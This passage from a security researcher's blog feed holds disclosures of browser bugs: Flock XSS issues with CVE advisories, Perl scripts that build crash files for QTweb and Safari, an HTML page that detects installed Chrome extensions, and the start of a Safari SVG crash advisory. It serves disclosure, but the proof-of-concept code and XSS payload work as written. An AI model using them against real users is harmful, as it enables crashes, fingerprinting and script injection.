I have contributed in secure Flock browser, i have tested version with google chrome&amp;nbsp; base. &lt;br /&gt;
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
TODO LIST / Bugs&lt;br /&gt;
###############&lt;br /&gt;
&lt;ol&gt;&lt;li&gt;&amp;nbsp;Inspector window attributes script injection chrome bug 31590&lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in search engine in chrome://history/ chrome bug 13760( not  exploitable from remote attackers ) (chrome://history/#q="&amp;gt;&amp;lt;iframe  src=javascript:alert(1)&amp;gt;&amp;amp;p=0) &lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in search box in favorites page (  chrome-extension://flock_people/favorites.html#p=1&amp;amp;v=all&amp;amp;o=0&amp;amp;s=title)(not  explotable from remote attackers) &lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in search engine extension when paste in url  (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable  from remote attackers) &lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in social extension when try to login in facebook or twiter or youtube  (not exploitable from remote attackers) &lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in rss vienwer in search box  chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not  exploitable from remote attackers)  &lt;/li&gt;
&lt;li&gt;&amp;nbsp;XSS in rss viewner when render xml from remote host if the entry has html  it is executed when view the news across flock rss viewner(exploitable via  remote sites) (see for example my feed =&amp;gt;  chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml)  and them if you type in search box for example " or &amp;lt; it executes again the  xss stored in xml file :)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;url with a leading NULL byte can bypass cross origin protection Chrome bug  37383&lt;/li&gt;
&lt;/ol&gt;&lt;br /&gt;
&lt;br /&gt;
###########################&lt;br /&gt;
Advisores from Flock developers&lt;br /&gt;
###########################&lt;br /&gt;
&lt;b&gt;FLOCK-SA-2010-04&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Title:  window.open() Method Javascript Same-Origin Policy Violation (XSS)&lt;br /&gt;
Impact: High&lt;br /&gt;
Announced on: 2010-09-09&lt;br /&gt;
Affected Products: Flock 3 versions prior to 3.0.0.4094&lt;br /&gt;
CVEs (cve.mitre.org): CVE-2010-0661&lt;br /&gt;
Details:&lt;br /&gt;
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.&lt;br /&gt;
&lt;br /&gt;
Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).&lt;br /&gt;
References:  https://bugs.webkit.org/show_bug.cgi?id=32647&lt;br /&gt;
http://code.google.com/p/chromium/issues/detail?id=30660&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;FLOCK-SA-2010-03&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Title:  javascript: url with a leading NULL byte can bypass cross origin protection (XSS)&lt;br /&gt;
Impact:  High&lt;br /&gt;
Announced on:  2010-09-09&lt;br /&gt;
Affected Products:  Flock 3 versions prior to 3.0.0.4112&lt;br /&gt;
CVEs (cve.mitre.org):  CVE-2010-1236&lt;br /&gt;
&lt;br /&gt;
Details:  &lt;br /&gt;
A javascript: url with a leading NULL byte can bypass cross origin protection,&lt;br /&gt;
which has unspecified impact and remote attack vectors.&lt;br /&gt;
&lt;br /&gt;
Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).&lt;br /&gt;
References:  https://bugs.webkit.org/show_bug.cgi?id=35948&lt;br /&gt;
http://code.google.com/p/chromium/issues/detail?id=37383&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;FLOCK-SA-2010-02&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Title:  A malicious RSS feed can bypass cross origin protection (XSS)&lt;br /&gt;
Impact:  High&lt;br /&gt;
Announced on:  2010-09-09&lt;br /&gt;
Affected Products:  Flock 3 versions prior to 3.0.0.4114&lt;br /&gt;
CVEs (cve.mitre.org):  CVE-2010-3262&lt;br /&gt;
&lt;br /&gt;
Details:  &lt;br /&gt;
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,&lt;br /&gt;
which has unspecified impact and remote attack vectors.&lt;br /&gt;
Credit to Lostmon Lords.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;FLOCK-SA-2010-01&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Title:  A malformed favourite can bypass cross origin protection (XSS)&lt;br /&gt;
Impact:  Moderate&lt;br /&gt;
Announced on:  2010-09-09&lt;br /&gt;
Affected Products:  Flock 3 versions prior to 3.0.0.4094&lt;br /&gt;
CVEs (cve.mitre.org):  CVE-2010-3202&lt;br /&gt;
Details:  &lt;br /&gt;
A malformed favourite imported from an HTML file, imported from another browser,&lt;br /&gt;
or manually created can bypass cross-origin protection, which has unspecified impact&lt;br /&gt;
and attack vectors.&lt;br /&gt;
Credit to Lostmon Lords.&lt;br /&gt;
References:  http://www.securityfocus.com/archive/1/513214&lt;br /&gt;
################################################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5029069277080376097?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Ygi_9XGkSBY4H44knBBrzbhZj3k/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/j17wPtPXaL0" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5029069277080376097?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5029069277080376097?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/j17wPtPXaL0/multiple-vulnerabilities-in-flock.html" title="Multiple vulnerabilities in Flock Browser 3.0.0.3989" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkcHRn8zeip7ImA9Wx9SGU4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-6719376436455755462</id><published>2010-12-08T21:53:00.002+01:00</published><updated>2010-12-09T22:27:17.182+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-09T22:27:17.182+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>QTweb browser for windows 3.7(Build 063) CSS Denial of Service</title><content type="html">#########################################################&lt;br /&gt;
QTweb browser for windows 3.7(Build 063) CSS Denial of Service&lt;br /&gt;
Vendor URL: http://www.qtweb.net/&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html&lt;br /&gt;
Vendor notify: NO exploit available: YES&lt;br /&gt;
##########################################################&lt;br /&gt;
&lt;br /&gt;
QTweb browser for windows is prone vulnerable to a denial of service&lt;br /&gt;
condition. An attacker can exploit this issue to cause the &lt;br /&gt;
affected browser to crash, effectively denying service to &lt;br /&gt;
legitimate users.&lt;br /&gt;
&lt;br /&gt;
The following are vulnerable:&lt;br /&gt;
&lt;br /&gt;
QTweb for windows 3.7(Build 063)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###########&lt;br /&gt;
Sample PoC&lt;br /&gt;
###########&lt;br /&gt;
&lt;br /&gt;
Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.&lt;br /&gt;
&lt;br /&gt;
#########################################################################&lt;br /&gt;
#  Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC  &lt;br /&gt;
#  Developer: http://www.Apple.com     &lt;br /&gt;
# Tested: Windows 7 Ultimate 32-bit                                                 &lt;br /&gt;
#########################################################################&lt;br /&gt;
# &lt;br /&gt;
#!/usr/bin/perl &lt;br /&gt;
my $file= "Crash_QTweb.html"; &lt;br /&gt;
my $junk= "A/" x 20000016;  &lt;br /&gt;
open($FILE,"&gt;$file"); &lt;br /&gt;
print $FILE "&amp;lt;html&gt;\n&amp;lt;head&gt;\n&amp;lt;style type='text/css'&gt;\nbody {shitCSS: ".$junk."}\n&amp;lt;/style&gt;\n&amp;lt;/head&gt;\n&amp;lt;/html&gt;"; &lt;br /&gt;
print "\nCrash_QTweb.html File Created successfully\n"; &lt;br /&gt;
close($FILE);&lt;br /&gt;
&lt;br /&gt;
############################# EOF ############################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6719376436455755462?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/Go9jC81qt1ISBzaVF49Ag1vDHXo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/vfjfvKKar7A" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6719376436455755462?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6719376436455755462?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/vfjfvKKar7A/qtweb-browser-for-windows-37build-063.html" title="QTweb browser for windows 3.7(Build 063) CSS Denial of Service" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YHR3k4fCp7ImA9Wx9SGEk.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-7414321458000636529</id><published>2010-12-08T21:44:00.001+01:00</published><updated>2010-12-08T21:45:36.734+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-08T21:45:36.734+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Safari for windows 5.0.2(7533.18.5) CSS Denial of Service</title><content type="html">#########################################################&lt;br /&gt;
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service&lt;br /&gt;
Vendor URL:http://www.Apple.com&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html&lt;br /&gt;
Vendor notify: NO exploit available: YES&lt;br /&gt;
##########################################################&lt;br /&gt;
&lt;br /&gt;
Safari for windows is prone vulnerable to a denial of service&lt;br /&gt;
condition. An attacker can exploit this issue to cause the &lt;br /&gt;
affected browser to crash, effectively denying service to &lt;br /&gt;
legitimate users.&lt;br /&gt;
&lt;br /&gt;
The following are vulnerable:&lt;br /&gt;
&lt;br /&gt;
safari for windows 5.0.2(7533.18.5)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###########&lt;br /&gt;
Sample PoC&lt;br /&gt;
###########&lt;br /&gt;
&lt;br /&gt;
Generate the Crash file and open it with safari,it hangs and arround one minut it crash&lt;br /&gt;
with a anormal program termination.&lt;br /&gt;
&lt;br /&gt;
#########################################################################&lt;br /&gt;
#  Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC  &lt;br /&gt;
#  Developer: http://www.Apple.com     &lt;br /&gt;
# Tested: Windows 7 Ultimate 32-bit                                                 &lt;br /&gt;
#########################################################################&lt;br /&gt;
# &lt;br /&gt;
#!/usr/bin/perl &lt;br /&gt;
my $file= "Crash_safari.html"; &lt;br /&gt;
my $junk= "A/" x 20000000;  &lt;br /&gt;
open($FILE,"&gt;$file"); &lt;br /&gt;
print $FILE "&amp;lt;html&gt;\n&amp;lt;head&gt;\n&amp;lt;style type='text/css'&gt;\nbody {shitCSS: ".$junk."}\n&amp;lt;/style&gt;\n&amp;lt;/head&gt;\n&amp;lt;/html&gt;"; &lt;br /&gt;
print "\nCrash_safari.html File Created successfully\n"; &lt;br /&gt;
close($FILE);&lt;br /&gt;
&lt;br /&gt;
############################# EOF ############################&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7414321458000636529?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/1jBvg_Py8AAC5TzYMQlKRlzdDM4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/M-EtmRmTe6s" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7414321458000636529?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7414321458000636529?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/M-EtmRmTe6s/safari-for-windows-5027533185-css.html" title="Safari for windows 5.0.2(7533.18.5) CSS Denial of Service" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEUFQXkycCp7ImA9Wx5QGEs.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-2406501614498517796</id><published>2010-09-07T14:20:00.003+02:00</published><updated>2010-09-07T14:23:30.798+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-09-07T14:23:30.798+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="extensions" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Google Chrome Instaled extensions arbitrary detection</title><content type="html">######################################################&lt;br /&gt;
Google Chrome Instaled extensions arbitrary detection&lt;br /&gt;
Vendor url: http://www.google.com&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html&lt;br /&gt;
Vendor notify:YES vendor confirmed.YES exploit:YES&lt;br /&gt;
######################################################&lt;br /&gt;
&lt;br /&gt;
Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html&lt;br /&gt;
&lt;br /&gt;
#########&lt;br /&gt;
Abstract&lt;br /&gt;
#########&lt;br /&gt;
&lt;br /&gt;
How safe is use extensions ?&lt;br /&gt;
a attacker can access via iframe to resource extensions ( at this moment i &lt;br /&gt;
don´t have found a way to altered information from extensions).&lt;br /&gt;
&lt;br /&gt;
like &lt;br /&gt;
&amp;gt;iframe&lt;br /&gt;
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"&amp;lt;&amp;gt;/iframe&amp;lt;&lt;br /&gt;
for example...&lt;br /&gt;
&lt;br /&gt;
a remote user can modify this web doc and call it with meta tag "base" &lt;br /&gt;
in a malformed doc...&lt;br /&gt;
&lt;br /&gt;
&amp;lt;BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/"&amp;gt;&lt;br /&gt;
so i thnik that chrome-extension need sanitizacion to don´t access internal&lt;br /&gt;
resources from external web pages..( file:/// and other protocols handlers&lt;br /&gt;
are safe to use and don´t give access to internal resources from external&lt;br /&gt;
web docs...)&lt;br /&gt;
&lt;br /&gt;
So chrome-extension protocol handler can be used to get extensions instaled&lt;br /&gt;
on client browser...and them if any extension is vulnerable to something&lt;br /&gt;
this information can be used for exploit this extension...&lt;br /&gt;
&lt;br /&gt;
In incognito mode Extensions can be detectable too&lt;br /&gt;
&lt;br /&gt;
###########################&lt;br /&gt;
A sample PoC of detection &lt;br /&gt;
###########################&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt;Chrome extensions detector PoC By Lostmon&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled Gmail checker&lt;br /&gt;
plus&amp;lt;/b&amp;gt;');" onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled Web Developer&amp;lt;/b&amp;gt;');"&lt;br /&gt;
onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img&lt;br /&gt;
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled  My Shortcuts&amp;lt;/b&amp;gt;');"&lt;br /&gt;
onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled  Firebug&amp;lt;/b&amp;gt;');"&lt;br /&gt;
onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img&lt;br /&gt;
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled  Webpage&lt;br /&gt;
Screenshot&amp;lt;/b&amp;gt;');" onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not&lt;br /&gt;
found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img&lt;br /&gt;
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled  Speed dial&amp;lt;/b&amp;gt;');"&lt;br /&gt;
onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;p&amp;gt;&amp;lt;img&lt;br /&gt;
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"&lt;br /&gt;
onLoad="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;you have instaled  Downloads&amp;lt;/b&amp;gt;');"&lt;br /&gt;
onError="document.write('&amp;lt;br /&amp;gt;&amp;lt;b&amp;gt;File not found&amp;lt;/b&amp;gt;');"&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
####################EOF##########################&lt;br /&gt;
&lt;br /&gt;
##############&lt;br /&gt;
Timeline&lt;br /&gt;
##############&lt;br /&gt;
&lt;br /&gt;
Discovered:27 may 2010&lt;br /&gt;
Vendor notify:01 jun 2010&lt;br /&gt;
Vendor patch:02 sep 2010&lt;br /&gt;
disclosure: 07 sep 2010&lt;br /&gt;
&lt;br /&gt;
#######################€ND ########################&lt;br /&gt;
&lt;br /&gt;
Thnx To Climbo for his patience and support.&lt;br /&gt;
&lt;br /&gt;
Atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2406501614498517796?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GADFeN7_lmTRavxUb8QwYxAdHxI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/x2ky8mCQsoM" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2406501614498517796?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2406501614498517796?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/x2ky8mCQsoM/google-chrome-instaled-extensions.html" title="Google Chrome Instaled extensions arbitrary detection" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkcGSHsyeCp7ImA9Wx5QEUU.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-7504508647732643695</id><published>2010-08-30T17:55:00.003+02:00</published><updated>2010-08-30T18:00:29.590+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-08-30T18:00:29.590+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Safari for windows Invalid SGV text style  Webkit.dll DoS</title><content type="html">###################################################&lt;br /&gt;
Safari for windows Invalid SGV text style &amp;nbsp;Webkit.dll DoS&lt;br /&gt;
Vendor URL:www.apple.com&lt;br /&gt;
Advisore:&lt;a href="http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html"&gt;http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html&lt;/a&gt;&lt;br /&gt;
Vendor notify :Yes exploit available :YES&lt;br /&gt;
###################################################&lt;br /&gt;
&lt;br /&gt;
Safari browser for windows is prone vulnerable to a Denial of&lt;br /&gt;
service condition , this issue affects webkit.dll and cause a&lt;br /&gt;
crash when Safari try to render a SGV image with a very long&lt;br /&gt;
font size text style.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
versions&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Safari for windows 5.0.1 (7533.17.8)&lt;br /&gt;
on windows 7 ultimate fully patched.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Safari for windows windows 5.0.1 (7533.17.8)&lt;br /&gt;
on windows xp home sp3 fully patched&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
Timeline&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Discovered:19-08-2010&lt;br /&gt;
vendor notofy:25-08-2010&lt;br /&gt;
Vendor response:26-08-2010&lt;br /&gt;
Disclosure: 30-09-2010&lt;br /&gt;
&lt;br /&gt;
####################&lt;br /&gt;
Proof Of Concept&lt;br /&gt;
####################&lt;br /&gt;
&lt;br /&gt;
Save This code as image.svg and open it with Safari,look&lt;br /&gt;
i have add some "extra" pixels in font size text style.&lt;br /&gt;
&lt;br /&gt;
################ BOF image.svg ######################&lt;br /&gt;
&lt;br /&gt;
&amp;lt;?xml version="1.0"?&amp;gt;&lt;br /&gt;
